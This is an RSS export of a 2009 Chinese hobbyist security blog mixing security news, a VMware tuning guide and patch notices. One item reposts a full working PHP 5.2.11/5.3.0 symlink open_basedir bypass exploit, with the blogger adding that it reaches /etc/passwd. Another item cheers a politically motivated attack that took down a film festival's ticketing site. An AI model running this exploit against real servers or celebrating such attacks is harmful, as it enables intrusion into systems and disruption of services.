<?xml version="1.0" encoding="gb2312"?>
<rss version="2.0">
<channel>
<title><![CDATA[H4~10ph7]]></title>
        <image>
        <title>http://hi.baidu.com</title>
        <link>http://hi.baidu.com</link>
        <url>http://img.baidu.com/img/logo-hi.gif</url>
        </image>
<description><![CDATA[君子敬而无失,与人恭而有礼,四海之内皆兄弟也...]]></description>
<link>http://hi.baidu.com/hackloft</link>
<language>zh-cn</language>
<generator>www.baidu.com</generator>
<ttl>5</ttl>


<item>
        <title><![CDATA[又一只iPhone蠕虫 这次玩真的 黑客可偷走机密资料]]></title>
        <link><![CDATA[http://hi.baidu.com/hackloft/blog/item/79d213ce4b64300992457eb7.html]]></link>
        <description><![CDATA[
		
		<p>　　CNET科技资讯网11月25日国际报道 前一次出现的那只只是会把破解版（或称越狱）<a style="display: inline;" target="_blank" href="http://news.sina.com.cn/wap/iphone.html">iPhone</a>(<a style="background: transparent url(http://i3.sinaimg.cn/dy/confv/090113/icon_mibile_01.gif) no-repeat scroll 0pt 45%; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous; padding-left: 12px; white-space: nowrap; display: inline-block;" target="_blank" href="http://news.sina.com.cn/wap/iphone.html">手机上网</a>)的背景图改变，但新的这只蠕虫则可让黑客偷走机密资料。</p>
<p>　　根据安全厂商Sophos的说法，这只蠕虫仅会攻击破解版的iPhone与iPod Touch。</p>
<p>　　Sophos在博客中提，“它会设定两个开机脚本，一个会在开机后执行蠕虫，一个则建立连线，把偷取的资料上传至一个位于立陶宛的服务器，同时也会把控制权转给蠕虫主人。”</p>
<p>　　破解版（jailbreaking，越狱）可让iPhone与iPod Touch用户不需通过苹果官方的App Store商店就能下载应用程序。</p>
<p>　　Sophos解释，这只病毒在Wi-Fi连线中的传播速度比在3G来得快，受害者会发现使用Wi-Fi连线上，电池消耗特别快，这是因为病毒“强力进行网络活动”之故。</p>
<p>　　换言之，这次的威胁可是认真的。Sophos建议受感染的iPhone与iPod Touch用户可恢复至苹果最近一次的固件更新。目前除此无其他办法。</p> <a href="http://hi.baidu.com/hackloft/blog/item/79d213ce4b64300992457eb7.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hackloft/blog/category/%D4%D3%C6%DF%D4%D3%B0%CB">杂七杂八</a>&nbsp;<a href="http://hi.baidu.com/hackloft/blog/item/79d213ce4b64300992457eb7.html#comment">查看评论</a>]]></description>
        <pubDate>2009-11-25  12:02</pubDate>
        <category><![CDATA[杂七杂八]]></category>
        <author><![CDATA[hackloft]]></author>
		<guid>http://hi.baidu.com/hackloft/blog/item/79d213ce4b64300992457eb7.html</guid>
</item>

<item>
        <title><![CDATA[PHP 5.2.11/5.3.0 symlink() open_basedir bypass]]></title>
        <link><![CDATA[http://hi.baidu.com/hackloft/blog/item/3afa631c62dc168186d6b67c.html]]></link>
        <description><![CDATA[
		
		<font size="2">The first main problem exist in security model based on symlinks<br>
open_basedir. Paths like $target and $link are checked by open_basedir. We<br>
can bypass open_basedir, but function symlink() is not affected. Issue has<br>
been generated by false security model designed by PHP.<br>
<br>
&lt;?php<br>
/*<br>
PHP 5.2.11/5.3.0 symlink() open_basedir bypass<br>
by Maksymilian Arciemowicz http://securityreason.com/<br>
cxib [ a.T] securityreason [ d0t] com<br>
<br>
CHUJWAMWMUZG<br>
*/<br>
<br>
$fakedir=&quot;cx&quot;;<br>
$fakedep=16;<br>
<br>
$num=0; // offset of symlink.$num<br>
<br>
if(!empty($_GET['file'])) $file=$_GET['file'];<br>
else if(!empty($_POST['file'])) $file=$_POST['file'];<br>
else $file=&quot;&quot;;<br>
<br>
echo '&lt;PRE&gt;&lt;img<br>
src=&quot;http://securityreason.com/gfx/logo.gif?cx5211.php&quot;&gt;&lt;P&gt;This is exploit<br>
from &lt;a<br>
href=&quot;http://securityreason.com/&quot; title=&quot;Security Audit PHP&quot;&gt;Security Audit<br>
Lab - SecurityReason&lt;/a&gt; labs.<br>
Author : Maksymilian Arciemowicz<br>
&lt;p&gt;Script for legal use only.<br>
&lt;p&gt;PHP 5.2.11 5.3.0 symlink open_basedir bypass<br>
&lt;p&gt;More: &lt;a href=&quot;http://securityreason.com/&quot;&gt;SecurityReason&lt;/a&gt;<br>
&lt;p&gt;&lt;form name=&quot;form&quot;<br>
action=&quot;http://'.$_SERVER[&quot;HTTP_HOST&quot;].htmlspecialchars($_SERVER[&quot;PHP_SELF<br>
&quot;]).'&quot; method=&quot;post&quot;&gt;&lt;input type=&quot;text&quot; name=&quot;file&quot; size=&quot;50&quot;<br>
value=&quot;'.htmlspecialchars($file).'&quot;&gt;&lt;input type=&quot;submit&quot; name=&quot;hym&quot;<br>
value=&quot;Create Symlink&quot;&gt;&lt;/form&gt;';<br>
<br>
if(empty($file))<br>
exit;<br>
<br>
if(!is_writable(&quot;.&quot;))<br>
die(&quot;not writable directory&quot;);<br>
<br>
$level=0;<br>
<br>
for($as=0;$as&lt;$fakedep;$as++){<br>
if(!file_exists($fakedir))<br>
mkdir($fakedir);<br>
chdir($fakedir);<br>
}<br>
<br>
while(1&lt;$as--) chdir(&quot;..&quot;);<br>
<br>
$hardstyle = explode(&quot;/&quot;, $file);<br>
<br>
for($a=0;$a&lt;count($hardstyle);$a++){<br>
if(!empty($hardstyle[$a])){<br>
if(!file_exists($hardstyle[$a]))<br>
mkdir($hardstyle[$a]);<br>
chdir($hardstyle[$a]);<br>
$as++;<br>
}<br>
}<br>
$as++;<br>
while($as--)<br>
chdir(&quot;..&quot;);<br>
<br>
@rmdir(&quot;fakesymlink&quot;);<br>
@unlink(&quot;fakesymlink&quot;);<br>
<br>
@symlink(str_repeat($fakedir.&quot;/&quot;,$fakedep),&quot;fakesymlink&quot;);<br>
<br>
// this loop will skip allready created symlinks.<br>
while(1)<br>
if(true==(@symlink(&quot;fakesymlink/&quot;.str_repeat(&quot;../&quot;,$fakedep-1).$file,<br>
&quot;symlink&quot;.$num))) break;<br>
else $num++;<br>
<br>
@unlink(&quot;fakesymlink&quot;);<br>
mkdir(&quot;fakesymlink&quot;);<br>
<br>
die('&lt;FONT COLOR=&quot;RED&quot;&gt;check symlink &lt;a<br>
href=&quot;./symlink'.$num.'&quot;&gt;symlink'.$num.'&lt;/a&gt; file&lt;/FONT&gt;');<br>
<br>
?&gt;<br>
<br>
提醒下 5.1.6也可以的 ：）<br>
直接/etc/<br>
然后点连接<br>
http://localhost/symlink1/passwd<br>
！！！！！！！！！！！！！！！！！！！！！<br>
</font><font size="2" style="font-size: 9.4px;"> </font> <a href="http://hi.baidu.com/hackloft/blog/item/3afa631c62dc168186d6b67c.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hackloft/blog/category/%D4%D3%C6%DF%D4%D3%B0%CB">杂七杂八</a>&nbsp;<a href="http://hi.baidu.com/hackloft/blog/item/3afa631c62dc168186d6b67c.html#comment">查看评论</a>]]></description>
        <pubDate>2009-11-18  01:24</pubDate>
        <category><![CDATA[杂七杂八]]></category>
        <author><![CDATA[hackloft]]></author>
		<guid>http://hi.baidu.com/hackloft/blog/item/3afa631c62dc168186d6b67c.html</guid>
</item>

<item>
        <title><![CDATA[Microsoft Reaches out at China Hacker Conference]]></title>
        <link><![CDATA[http://hi.baidu.com/hackloft/blog/item/7d91bc81eaf5d3d1bd3e1e5c.html]]></link>
        <description><![CDATA[
		
		<p>Microsoft shared the stage with Chinese security researchers at a Beijing hacker conference on Wednesday, aiming to build ties in a country that produces a growing number of threats to Microsoft products.</p>
<p>John Lambert, a team head at the Microsoft Security Engineering Center, spoke to an audience of a few hundred people about security features in Microsoft products and tools used by the company to find vulnerabilities in its software.</p>
<p>Microsoft has worked to build contacts with security researchers worldwide, but the language barrier and low attendance by Chinese experts at overseas conferences make the country&rsquo;s security circles harder to access, Lambert said.</p>
<p>Important security research increasingly comes out of China, but is often presented in Chinese, he said.</p>
<p>Microsoft was a sponsor of the Beijing forum, called XCon, and Lambert said the company would consider attending other security conferences in China where skilled researchers gather.</p>
<p>Microsoft also wants to educate more Chinese software developers on security issues to shield Windows and Internet Explorer users from vulnerabilities in third-party programs, said Lambert.</p>
<p>China produces a growing amount of malware, which usually targets domestic users but is sometimes aimed abroad as well. Two zero-days, or previously unknown vulnerabilities, that were found this year in Internet Explorer appeared to come out of China, said Lambert.</p>
<p>Other speakers at the forum shared tactics that could be used to find or exploit vulnerabilities in software, but researchers in the audience said Microsoft measures had made attacking its programs with exploits more difficult.</p>
<p>&ldquo;There may still be vulnerabilities, but it&rsquo;s harder to exploit them,&rdquo; said one researcher. He cited one obstacle as address space layout randomization, a function included in Windows Vista that rearranges the positions of key system code when a PC restarts.</p>
<p>But attackers searching for vulnerabilities in Microsoft products are as active as ever, he said.</p>
<p>One Chinese researcher at the forum demonstrated a tool for fuzz testing of software, a technique used by software vendors and attackers that involves feeding a program invalid data inputs to see what causes a crash. The tool recorded program activity during a crash to help a tester pinpoint its cause. One speaker duo discussed ways to trace the code changes between original and updated versions of a program and another speaker presented tactics used in cross-site scripting, a vulnerability that allows malicious code to be injected to Web sites.</p>
<p>Forum organizers at first said reporting on the event was banned because it dealt with sensitive topics.</p> <a href="http://hi.baidu.com/hackloft/blog/item/7d91bc81eaf5d3d1bd3e1e5c.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hackloft/blog/category/%D4%D3%C6%DF%D4%D3%B0%CB">杂七杂八</a>&nbsp;<a href="http://hi.baidu.com/hackloft/blog/item/7d91bc81eaf5d3d1bd3e1e5c.html#comment">查看评论</a>]]></description>
        <pubDate>2009-08-22  14:03</pubDate>
        <category><![CDATA[杂七杂八]]></category>
        <author><![CDATA[hackloft]]></author>
		<guid>http://hi.baidu.com/hackloft/blog/item/7d91bc81eaf5d3d1bd3e1e5c.html</guid>
</item>

<item>
        <title><![CDATA[六招优化VMware 虚拟机]]></title>
        <link><![CDATA[http://hi.baidu.com/hackloft/blog/item/6504f8347cd796325bb5f5e1.html]]></link>
        <description><![CDATA[
		
		<div class="tit"> </div>
<table style="table-layout: fixed">
    <tbody>
        <tr>
            <td>
            <div class="cnt" ><strong><br>
            </strong>
            <table class="p13" style="border-top: rgb(255,255,255) 8px solid" cellspacing="0" cellpadding="3" width="530" border="0">
                <tbody>
                    <tr>
                        <td> </td>
                    </tr>
                </tbody>
            </table>
            <table class="content01" style="border-top: rgb(255,255,255) 8px solid" cellspacing="0" cellpadding="5" width="530" border="0">
                <tbody>
                    <tr>
                        <td>作者：河北经贸大学信息技术学院 王春海　</td>
                    </tr>
                </tbody>
            </table>
            <hr width="530" color="#1377d7" size="3">
            <p style="text-indent: 2em">VMware 的主要产品包括VMware Workstation、VMware Server、VMware ESX Server，还有一些与这些产品相配套使用或者辅助使用的产品，例如VMware converter、VMware ACE、VMware Virtual Center等。对于普通用户而言，VMware Workstation足以满足绝大多数虚拟应用需求，因此本文介绍的优化方法主要针对VMware Workstation，具体版本为VMware Workstation 6。</p>
            <p style="text-indent: 2em">1.安装组件优化</p>
            <p style="text-indent: 2em">VMware Workstation 6集成了Debug功能，而在该版本中，这个功能默认是启用的。当启用这个功能时，虚拟机运行会非常慢。我们可以在安装VMware Workstation 6的时候，取消这个功能，如图1所示。</p>
            <p style="text-indent: 2em"><img src="http://media.ccidnet.com/media/ciw/img/1609/c3001t01.jpg"></p>
            <p style="text-indent: 2em">图1 取消debug组件加快运行速度</p>
            <p style="text-indent: 2em">2.参数设置优化</p>
            <p style="text-indent: 2em">安装VMware Workstation后，从Edit菜单进入Preferences设置页，注意下面这些设置。</p>
            <p style="text-indent: 2em">（1）默认工作区选择&mdash;虚拟机文件优化。</p>
            <p style="text-indent: 2em">如图2所示，在Workspace选项卡中，在Default location for virtual machines and teams文本框中，选择VMware Workstation的默认工作区，在此请选择剩余空间最大的分区，并为VMware Workstation使用的虚拟机文件专门创建一个文件夹，以后创建的默认虚拟机都将保存在这个文件夹中。</p>
            <p style="text-indent: 2em"><img src="http://media.ccidnet.com/media/ciw/img/1609/c3001t02.jpg"></p>
            <p style="text-indent: 2em">图2 工作区选择</p>
            <p style="text-indent: 2em">【说明】该工作区默认文件夹最好选择一个NTFS文件系统的分区，不要选择FAT32的分区。</p>
            <p style="text-indent: 2em">（2）内存设置：性能优化。</p>
            <p style="text-indent: 2em">在Memory选项卡中，内置虚拟机使用的内存分配方式。如果主机内存足够大，并且 想提高虚拟机的性能，可以选择Fit all virtual machine memory into reserved host RAM这一项。这样，所有虚拟机在运行的时候将立刻从主机分配其设置的内存大小，对于虚拟机来说，选择本项性能最优。如果主机内存比较小，则需要选择第三 项Allow most virtual machine memory to be swapped，如图3所示。</p>
            <p style="text-indent: 2em"><img src="http://media.ccidnet.com/media/ciw/img/1609/c3001t03.jpg"></p>
            <p style="text-indent: 2em">图3 内存选项</p>
            <p style="text-indent: 2em">（3）虚拟网络设置：网络使用优化。</p>
            <p style="text-indent: 2em">VMware Workstation在安装的时候，会自动添加VMnet1和VMnet8两块虚拟网卡，并且为每个网卡随机分配一个&ldquo;192.168.x.x&rdquo;、子网 掩码为&ldquo;255.255.255.0&rdquo;的网段地址。如果机器上保存了大量的虚拟机文件，并且经常做网络实验时，会发现每次都要修改虚拟机的网卡地址。实际 上，可以在&ldquo;VM&rdquo;菜单选择Virtual Network Editor命令，在Host Virtual Network Mapping选项卡，统一设置VMnet1和VMnet8的地址为习惯使用的地址。例如，可以设置VMnet1为192.168.10.0/24，设置 VMnet8为192.168.80.0/24。</p>
            <p style="text-indent: 2em">3.虚拟机创建优化</p>
            <p style="text-indent: 2em">在创建虚拟机的时候，请使用&ldquo;定制&rdquo;方式创建虚拟机，并且要注意下面的事项：</p>
            <p style="text-indent: 2em">（1）创建Windows 2000、Windows 2003/XP的虚拟机时，如果使用&ldquo;虚拟硬盘&rdquo;，则要创建SCSI接口的虚拟硬盘（可以从http://download3.vmware.com /software/vmscsi-1.2.0.4.flp下载SCSI驱动程序）。在指定虚拟硬盘大小时，如果想方便日后使用，应尽可能创建大一些的虚 拟硬盘，例如创建100GB、300GB（最大950GB）的虚拟硬盘。如果想提高性能，则按照实际的需要创建（例如，虚拟机准备安装Windows Server 2003并且做DHCP服务器，就只需要创建5GB大小的虚拟硬盘即可），并且选中Allocate all disk space now。这样，系统会立刻从计算机上划分5GB大小空间作为该虚拟机的虚拟硬盘使用，如图4所示。</p>
            <p style="text-indent: 2em"><img src="http://media.ccidnet.com/media/ciw/img/1609/c3001t04.jpg"></p>
            <p style="text-indent: 2em">图4 创建虚拟硬盘</p>
            <p style="text-indent: 2em">（2）为了进一步提高虚拟硬盘性能，可以使用主机的物理硬盘或者主机物理硬盘的一个 分区作为虚拟机的硬盘。只需要选择创建虚拟机，在Select a Disk选项中选择Use physical disk （for advanced users），并且按照提示使用即可。注意，如果对VMware Workstation不是很熟悉，不要选择这项。</p>
            <p style="text-indent: 2em">4.虚拟机配置优化</p>
            <p style="text-indent: 2em">在创建虚拟机完成后，打开虚拟机的配置文件。</p>
            <p style="text-indent: 2em">对于每个虚拟机的配置，请在Virtual Machine Settings页中，删除不需要的设备。例如，如果虚拟机准备安装Windows 2000 Server、Windows Server 2003，可以删除声卡设备，对于软驱，不要选中Connect at power on（因为现在的主机都不配置软驱），而在需要的时候，再选中并且使用软驱镜像文件作为虚拟机的软驱。在Processors设置中，通常选择使用1个虚 拟CPU即可（使用两个虚拟CPU对提升虚拟机的性能作用不大，但会占用过多的主机CPU时间）。</p>
            <p style="text-indent: 2em">5.VMware Tools优化</p>
            <p style="text-indent: 2em">在虚拟机中安装操作系统后，一定要安装VMware Tools以提高性能。如果是Windows虚拟机，可以打开Virtual Machine Settings页，在Options选项卡的Tools项中，选中Upgrade automatically at next power on以自动安装VMware Tools。</p>
            <p style="text-indent: 2em">对于Linux虚拟机，可以使用下面的命令（以VMware Workstation 6.0正式版为例）安装VMware Tools。</p>
            <p style="text-indent: 2em">mount /dev/cdrom /mnt/cdrom</p>
            <p style="text-indent: 2em">cd /tmp</p>
            <p style="text-indent: 2em">tar zxpf /mnt/cdrom/VMwareTools-6.0.0-45731.tar.gz</p>
            <p style="text-indent: 2em">cd vmware-tools-distrib</p>
            <p style="text-indent: 2em">./vmware-install.pl</p>
            <p style="text-indent: 2em">对于Netware虚拟机，同样需要安装VMware Tools。在Netware虚拟机中，安装VMware Tools的方法比较简单，只要复制VMware Tools到虚拟机C盘一个文件夹中（例如C盘的drive文件夹），并在Netware中编辑AUTOEXEC.NCF file，在最后一行加上：</p>
            <p style="text-indent: 2em">load c:\drive\vmwtinst.nlm</p>
            <p style="text-indent: 2em">Netware的VMware Toools将自动加载。</p>
            <p style="text-indent: 2em">如果是DOS虚拟机，需要安装VMware Workstation提供的dosidle.exe程序，减少DOS虚拟机的CPU占用率。</p>
            <p style="text-indent: 2em">6.磁盘空间优化</p>
            <p style="text-indent: 2em">可以使用VMware Workstation提供的克隆与快照功能，在需要使用多个不同状态的虚拟机时，减少磁盘空间的占用，如图5所示。</p>
            <p style="text-indent: 2em"><img src="http://media.ccidnet.com/media/ciw/img/1609/c3001t05.jpg"></p>
            <p style="text-indent: 2em">图5 利用快照功能 释放硬盘空间</p>
            <p style="text-indent: 2em">例如，需要做Windows Server 2003 Active Directory、Exchange Server 2003/2007的实验。可以先安装好Windows Server 2003作为模板，然后创建克隆虚拟机并且链接到模板虚拟机，在克隆后的虚拟机中做实验。可以使用克隆功能，在同一个模板虚拟机中，创建没有数量限制（只 受限于硬盘空间）的多个虚拟机，并且在实验完成后，删除链接虚拟机释放硬盘空间。</p>
            <p style="text-indent: 2em">而使用快照功能，可以在一个虚拟机中，创建多个不同的还原点并且占用很少的硬盘空 间。例如，在实验中，可能需要Windows Server 2003、Windows Server 2003 SP1、Windows Server 2003 SP2的环境，这样，可以先安装Windows Server 2003，然后创建快照，之后在这台Windows Server 2003中安装SP1补丁，然后再创建快照，最后再安装SP2补丁并创建快照，这样，等于有了三个不同状态的计算机，并且，也可以以这三个快照为基准模 板。</p>
            </div>
            </td>
        </tr>
    </tbody>
</table> <a href="http://hi.baidu.com/hackloft/blog/item/6504f8347cd796325bb5f5e1.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hackloft/blog/category/%D6%AA%CA%B6%D6%AA%CA%B6">知识知识</a>&nbsp;<a href="http://hi.baidu.com/hackloft/blog/item/6504f8347cd796325bb5f5e1.html#comment">查看评论</a>]]></description>
        <pubDate>2009-08-04  17:54</pubDate>
        <category><![CDATA[知识知识]]></category>
        <author><![CDATA[hackloft]]></author>
		<guid>http://hi.baidu.com/hackloft/blog/item/6504f8347cd796325bb5f5e1.html</guid>
</item>

<item>
        <title><![CDATA[黑客大会前夕安全专家网站相继被黑]]></title>
        <link><![CDATA[http://hi.baidu.com/hackloft/blog/item/46187fc38d03845cb319a808.html]]></link>
        <description><![CDATA[
		
		<p>　　7月31日国际报道 在黑帽(Black Hat)安全会议举行前夕，一群安全专家与组织的网站遭到黑客入侵，包括网站登入密码、电子邮件、即时通信(IM)聊天纪录等信息全被PO上网。</p>
<p>　　被锁定的攻击目标包括Dan Kaminsky，他去年因为发现网域名系统的一个重大安全漏洞而出名；Kevin Mitnick，著名的黑客，曾因电脑犯罪而遭到起诉；以及PerlMunks，程序设计师社区网站。</p>
<p>　　Kaminsky的网站被黑客贴上长篇论述，指责这群受害者缺乏安全专业能力，夸大安全威胁只为了让自己的事业更上层楼。黑客如何入侵这些人士的网站，目前不得而知，但几个遭到攻击的博客是架设在WordPress上，而有人指出该软件潜在安全漏洞。</p>
<p>　　回应网站遭到入侵事件，Kaminsky说：这只是为了戏剧效果罢了。</p>
<p>　　他说：如果有技术上吸引人的事情可提出来讨论，那很酷。但我希望，我的约会细节让人觉得有趣。Kaminsky准备在黑帽会议的一场发布会上，谈论公共设施加密标准X.509的问题。</p>
<p>　　Mitnick则表示，大约十天前，某人从一个欧洲IP地址入侵托管网站，并把网址转向一个显示他合成色情照片的网站。一周后，他的个人网站也遭到入侵，档案被删除，极可能是同一批人所为，可能是通过第一次攻击留下的后门入侵。</p>
<p>　　Mitnick说：他们查遍我的网站服务器，但我从不在那里存电子邮件或个人档案，有的只是公开可得的资讯。Mitnick说，托管他网站的服务提供者，也是他的友人，已要求他离开，因为黑客一再攻击并删除顾客的资料，令人不堪其扰。因此，Mitnick已转台，迁往专精安全性的FireHost。</p>
<p>　　Mitnick说，让人有百毒不侵幻觉的Kaminsky，其实把他所有的电邮、研究和个人档案都存在一个与互联网连结的服务器上。</p>
<p>　　Mitnick的网站已四度被黑客入侵得逞，但他说，他的网站不是自己管理的，这让他能把对外公开的网站与自己的企业网络分开。</p>
<p>　　他对Kaminsky遭遇攻击一事的评论是：我很尊敬此人，我认为他在信息安全方面的才智超强，但连他也成为受害者。在公共的服务器上，你是不宜存放任何私密信息的。</p> <a href="http://hi.baidu.com/hackloft/blog/item/46187fc38d03845cb319a808.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hackloft/blog/category/%D4%D3%C6%DF%D4%D3%B0%CB">杂七杂八</a>&nbsp;<a href="http://hi.baidu.com/hackloft/blog/item/46187fc38d03845cb319a808.html#comment">查看评论</a>]]></description>
        <pubDate>2009-08-02  12:37</pubDate>
        <category><![CDATA[杂七杂八]]></category>
        <author><![CDATA[hackloft]]></author>
		<guid>http://hi.baidu.com/hackloft/blog/item/46187fc38d03845cb319a808.html</guid>
</item>

<item>
        <title><![CDATA[中国黑客又“黒”了澳墨尔本电影节官网（图）]]></title>
        <link><![CDATA[http://hi.baidu.com/hackloft/blog/item/580a6899b130c2016e068c0e.html]]></link>
        <description><![CDATA[
		
		<p>继前两天看到的黑德国电网事件后 又一件引起关注的</p>
<p>哇晒 黑客 太牛了</p>
<div class="core">
<div class="coreTop"> </div>
<div class="coreTxt">&ldquo;疆独&rdquo;头目热比娅及&ldquo;世维会&rdquo;的其他不法分子阴谋策划了新疆打砸抢暴力事件，中国政府一再重申该次暴乱是中国内政，澳大利亚墨尔本电影节不顾中国主权让热比娅参加，并发放了签证，严重违反了应尊重他国主权和尊严国际法义务。</div>
</div>
<div style="cursor: default; color: #f5f8fd; text-align: center">http://news.mylegist.com/18/2009-08-02/47172.html</div>
<div class="divContent" >
<div class="text f14px">
<p align="center"><font face="宋体"><font face="宋体"><img alt="中国黑客又&ldquo;黒&rdquo;了澳墨尔本电影节官网(图)" src="http://www.mylegist.com/upload/2009-08-02/content_images/1249177170728.jpg"></font></font></p>
<p align="center"><font>电影节官网第一次被黑</font></p>
<p align="left"><font face="宋体"><font face="宋体">继澳大利亚电影节官方网站在6月25日遭受据传是中国黑客的攻击后，</font></font><font face="宋体">国外媒体报道称，该电影节网站再次受到来自中国黑客的攻击，其网站票务系统瘫痪。</font><font face="宋体"><br>
澳大利亚墨尔本电影节不顾中方反对放映美化&ldquo;疆独&rdquo;头目热比娅的纪录片《爱的10个条件》，澳方还向热比娅发放了签证，允许其来澳参加该纪录片的放映活动。据法新社报道，中国黑客由于不满澳大利亚的做法，而对该电影节的网站发动了再次攻击。</font></p>
<p align="left">据电影节发言人阿莎·赫尔姆斯称，澳大利亚电影节官方网站的网上售票系统已经被关闭，该系统此前受到了众多&ldquo;假冒&rdquo;购票者的攻击，致使整个售票系统全部显示为&ldquo;票已售罄&rdquo;。</p>
<p align="left">赫尔姆斯称，一个据称来自于中国的名叫&ldquo;向全中国人民发出号召&rdquo;的网站发起了攻击。该网站讲解了如何用假身份网上购买电影票，其目标针对澳大利亚电影节播放的《爱的十个条件》。赫尔姆斯称:&ldquo;攻击明显是为了关闭购票系统，攻击也已经取得效果。&rdquo;&ldquo;我们不得不关闭网上售票系统，并要求所有人通过售票点或电话购票。&rdquo;</p>
<p align="left">赫尔姆斯同时称，我们能够预见在我们<a href="http://baike.mylegist.com/1209/2009-07-14/40257.html" target="_blank">撤销</a>放映《爱的十个条件》之前，这类抗议活动还将继续，&ldquo;但我们不会撤掉电影&rdquo;。《环球时报》记者北京时间1日中午登陆澳大利亚电影节官方网站后发现，该网站已经注明&ldquo;售票系统关闭&rdquo;。</p>
<p align="left">澳洲媒体此前报道称，澳方已于30日向&ldquo;疆独&rdquo;头目热比娅发放了签证，以便让其参加第58届墨尔本国际电影节。热比娅计划在纪录片《爱的10个条件》放映后还将举行&ldquo;问答会&rdquo;。</p>
<p align="left">中国外交部31日就澳大利亚允许热比娅去澳提出严正交涉。外交部副部长张志军31日召见澳大利亚驻华大使芮捷锐，就澳方允许热比娅去澳提出严正交涉，对澳方此举表示强烈不满和坚决反对。张志军敦促澳方立即纠正<a href="http://baike.mylegist.com/1207/2009-06-16/35749.html" target="_blank">错误</a>，不允许热比娅窜访澳大利亚并利用澳大利亚领土从事反华分裂活动。</p>
<p align="left">【<a href="http://www.mylegist.com./" target="_blank">法律界</a>提示】&ldquo;疆独&rdquo;头目热比娅及&ldquo;世维会&rdquo;的其他不法分子阴谋策划了新疆打砸抢暴力事件，中国政府一再重申该次暴乱是中国内政，澳大利亚墨尔本电影节不顾中国主权让热比娅参加，并发放了签证，严重违反了应尊重他国主权和尊严<a href="http://baike.mylegist.com/1214/2009-07-04/38584.html" target="_blank">国际法</a>义务。</p>
</div>
</div> <a href="http://hi.baidu.com/hackloft/blog/item/580a6899b130c2016e068c0e.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hackloft/blog/category/%D4%D3%C6%DF%D4%D3%B0%CB">杂七杂八</a>&nbsp;<a href="http://hi.baidu.com/hackloft/blog/item/580a6899b130c2016e068c0e.html#comment">查看评论</a>]]></description>
        <pubDate>2009-08-02  12:33</pubDate>
        <category><![CDATA[杂七杂八]]></category>
        <author><![CDATA[hackloft]]></author>
		<guid>http://hi.baidu.com/hackloft/blog/item/580a6899b130c2016e068c0e.html</guid>
</item>

<item>
        <title><![CDATA[Adobe修复Flash 0day高危漏洞 :)]]></title>
        <link><![CDATA[http://hi.baidu.com/hackloft/blog/item/8c4385fb86bdc81f6d22eb1b.html]]></link>
        <description><![CDATA[
		
		<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  一周前Adobe公开表示，当前版本的Flash Player（9.0和10.0版本）和Adobe Reader/Acrobat 9.x的authplay.dll中存在一个危急的安全漏洞，Flash中的该漏洞影响Windows、Mac和Linux系统用户，Adobe Reader/Acrobat中的该漏洞影响Windows、Mac和Unix用户。</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  这一高危漏洞会导致系统崩溃，也有可能会被黑客利用进行远程代码攻击，按照原定计划Adobe于今天为Windows、Mac和Linux系统Flash Player 9和10版本发布了升级补丁，为Solaris系统发布Flash Player补丁的日期仍然没有确定。今日晚间或明日为Windows、Mac、Unix系统发布Adobe Reader/Acrobat 9.1.2补丁。</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  Adobe提醒Flash Player 9.x和10.x及更早版本用户升级到Adobe Flash Player 9.0.246.0和10.0.32.18，Adobe AIR 1.5.1及更早版本用户升级到Adobe AIR 1.5.2。用户可查看&ldquo;关于Adobe Flash Player&rdquo;页面或右键点击Flash内容从菜单中选择&ldquo;关于Adobe (or Macromedia) Flash Player&rdquo;来查看当前使用的Adobe Flash Player版本号。</p>
<p><strong>Adobe Flash Player 漏洞补丁下载</strong></p>
<p>Adobe Flash Player 10.0.22.87及以前版本：<a href="http://get.adobe.com/flashplayer/"><span style="color: #3366ff">http://get.adobe.com/flashplayer/</span></a></p>
<p>Adobe Flash Player 9/9.0.246.0：<a href="http://www.adobe.com/products/flashplayer/fp_distribution3.html"><span style="color: #3366ff">http://www.adobe.com/products/flashplayer/fp_distribution3.html</span></a></p>
<p>Adobe AIR 1.5.1及以前版本：<a href="http://get.adobe.com/cn/air/"><span style="color: #3366ff">http://get.adobe.com/cn/air/</span></a></p>
<p><strong>Adobe Flash Player 10.0.32.18直接下载</strong></p>
<p><a href="http://fpdownload.macromedia.com/get/flashplayer/current/licensing/win/install_flash_player_10_active_x.exe" target="_blank"><span style="color: #3366ff">Adobe Flash Player for (Internet Explorer)</span></a></p>
<p><a href="http://fpdownload.macromedia.com/get/flashplayer/current/install_flash_player.exe" target="_blank"><span style="color: #3366ff">Adobe Flash Player for (Firefox, Netscape, Safari &amp; Opera)</span></a></p> <a href="http://hi.baidu.com/hackloft/blog/item/8c4385fb86bdc81f6d22eb1b.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/hackloft/blog/category/%D4%D3%C6%DF%D4%D3%B0%CB">杂七杂八</a>&nbsp;<a href="http://hi.baidu.com/hackloft/blog/item/8c4385fb86bdc81f6d22eb1b.html#comment">查看评论</a>]]></description>
        <pubDate>2009-08-01  11:04</pubDate>
        <category><![CDATA[杂七杂八]]></category>
        <author><![CDATA[hackloft]]></author>
		<guid>http://hi.baidu.com/hackloft/blog/item/8c4385fb86bdc81f6d22eb1b.html</guid>
</item>

<item>
        <title><![CDATA[Windows Server 2008 R2 RTM]]></title>
        <link><![CDATA[http://hi.baidu.com/hackloft/blog/item/6504f834675e89325bb5f59a.html]]></link>
        <description><![CDATA[
		
		<p><a href="http://www.brsbox.com/filebox/down/fc/9a15973ed23c432b3e2076b3df8baeeb" target="_blank"></a></p>
<p><u><font color="#0000ff"><strong>(official English version and global package for all languages) </strong></font></u><a href="http://www.brsbox.com/filebox/down/fc/9a15973ed23c432b3e2076b3df8baeeb" target="_blank"></a></p>
<p><a href="http://www.brsbox.com/filebox/down/fc/9a15973ed23c432b3e2076b3df8baeeb" target="_blank"><span style="color: #0066cc"><strong>http://www.brsbox.com/filebox/down/fc/9a15973ed23c432b3e2076b3df8baeeb</strong></span></a></p>
